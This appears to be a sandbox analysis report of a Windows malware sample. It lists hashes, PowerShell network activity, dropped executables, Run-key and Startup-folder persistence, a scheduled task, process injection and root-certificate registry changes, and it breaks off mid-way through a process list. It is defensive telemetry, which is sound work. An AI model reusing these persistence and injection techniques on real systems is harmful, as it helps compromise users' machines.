Analysis
-
max time kernel
119s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
24-12-2023 04:05
Behavioral task
behavioral1
Sample
eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe
Resource
win10v2004-20231215-en
General
-
Target
eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe
-
Size
581KB
-
MD5
66c5df3f2f19ce77bdeb31bba7de7139
-
SHA1
b17851297a70359c6d5c3b33cafa1f308be263dd
-
SHA256
eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5
-
SHA512
1097b7bc88f7511385cfa081b8e893ed261cf859c1c65aca32405b28d8c6e887a9e37ba9ee74cac8f986b6522c5754222b8763143b9d88653153fa20563bb111
-
SSDEEP
12288:ggx6pwnS3Px5A1vLnviFHl4oJuHwUK5vVDqrmdsqQRWgQ:RTSg1vLv86XHdyVDZdspR
Malware Config
Signatures
-
Blocklisted process makes network request 12 IoCs
flow pid Process 22 1080 powershell.exe 23 1080 powershell.exe 27 2036 powershell.exe 28 2036 powershell.exe 30 2708 powershell.exe 31 2708 powershell.exe 33 2452 powershell.exe 34 2452 powershell.exe 36 1936 powershell.exe 37 1936 powershell.exe 39 1296 powershell.exe 40 1296 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe RegAsm.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.NET Framework.exe RegAsm.exe -
Executes dropped EXE 7 IoCs
pid Process 992 ngqOLMUHlZ.exe 1772 j8KsnCTMHC.exe 1472 rJ8Nd8RdAx.exe 2060 HRtZImoued.exe 1908 MGSumxcpSx.exe 1284 kPxex847I7.exe 596 CMWYeIDpgd.exe -
resource yara_rule behavioral1/memory/2040-0-0x000000013F130000-0x000000013F294000-memory.dmp upx behavioral1/memory/2040-174-0x000000013F130000-0x000000013F294000-memory.dmp upx behavioral1/memory/2040-247-0x000000013F130000-0x000000013F294000-memory.dmp upx behavioral1/memory/2040-321-0x000000013F130000-0x000000013F294000-memory.dmp upx behavioral1/memory/2040-327-0x000000013F130000-0x000000013F294000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Windows\CurrentVersion\Run\dfs1 = "C:\\Users\\Admin\\AppData\\Roaming\\f32\\331.exe" powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1284 set thread context of 2388 1284 kPxex847I7.exe 64 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 892 schtasks.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file\shell\Read\command rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file\ rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.sln rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\.sln\ = "sln_auto_file" rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file\shell\Read rundll32.exe Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file\shell rundll32.exe Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000_CLASSES\sln_auto_file\shell\Read\command\ = "\"C:\\Program Files (x86)\\Adobe\\Reader 9.0\\Reader\\AcroRd32.exe\" \"%1\"" rundll32.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1284 kPxex847I7.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 1080 powershell.exe 2036 powershell.exe 2708 powershell.exe 2452 powershell.exe 1936 powershell.exe 1296 powershell.exe 2800 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3056 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 1080 powershell.exe Token: SeDebugPrivilege 2036 powershell.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 2800 powershell.exe Token: SeDebugPrivilege 2388 RegAsm.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3056 AcroRd32.exe 3056 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2040 wrote to memory of 2776 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 28 PID 2040 wrote to memory of 2776 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 28 PID 2040 wrote to memory of 2776 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 28 PID 2776 wrote to memory of 2292 2776 cmd.exe 30 PID 2776 wrote to memory of 2292 2776 cmd.exe 30 PID 2776 wrote to memory of 2292 2776 cmd.exe 30 PID 2292 wrote to memory of 3056 2292 rundll32.exe 31 PID 2292 wrote to memory of 3056 2292 rundll32.exe 31 PID 2292 wrote to memory of 3056 2292 rundll32.exe 31 PID 2292 wrote to memory of 3056 2292 rundll32.exe 31 PID 2040 wrote to memory of 2288 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 32 PID 2040 wrote to memory of 2288 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 32 PID 2040 wrote to memory of 2288 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 32 PID 2288 wrote to memory of 992 2288 cmd.exe 34 PID 2288 wrote to memory of 992 2288 cmd.exe 34 PID 2288 wrote to memory of 992 2288 cmd.exe 34 PID 992 wrote to memory of 1080 992 ngqOLMUHlZ.exe 35 PID 992 wrote to memory of 1080 992 ngqOLMUHlZ.exe 35 PID 992 wrote to memory of 1080 992 ngqOLMUHlZ.exe 35 PID 2040 wrote to memory of 2820 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 41 PID 2040 wrote to memory of 2820 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 41 PID 2040 wrote to memory of 2820 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 41 PID 2820 wrote to memory of 1772 2820 cmd.exe 37 PID 2820 wrote to memory of 1772 2820 cmd.exe 37 PID 2820 wrote to memory of 1772 2820 cmd.exe 37 PID 1772 wrote to memory of 2036 1772 j8KsnCTMHC.exe 39 PID 1772 wrote to memory of 2036 1772 j8KsnCTMHC.exe 39 PID 1772 wrote to memory of 2036 1772 j8KsnCTMHC.exe 39 PID 2040 wrote to memory of 2012 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 46 PID 2040 wrote to memory of 2012 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 46 PID 2040 wrote to memory of 2012 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 46 PID 2012 wrote to memory of 1472 2012 cmd.exe 44 PID 2012 wrote to memory of 1472 2012 cmd.exe 44 PID 2012 wrote to memory of 1472 2012 cmd.exe 44 PID 1472 wrote to memory of 2708 1472 rJ8Nd8RdAx.exe 43 PID 1472 wrote to memory of 2708 1472 rJ8Nd8RdAx.exe 43 PID 1472 wrote to memory of 2708 1472 rJ8Nd8RdAx.exe 43 PID 2040 wrote to memory of 2672 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 51 PID 2040 wrote to memory of 2672 2040 eef39416246446da8684c092ed5d4d9fcda5f55f690a638f62196dbf18c51aa5.exe 51 PID 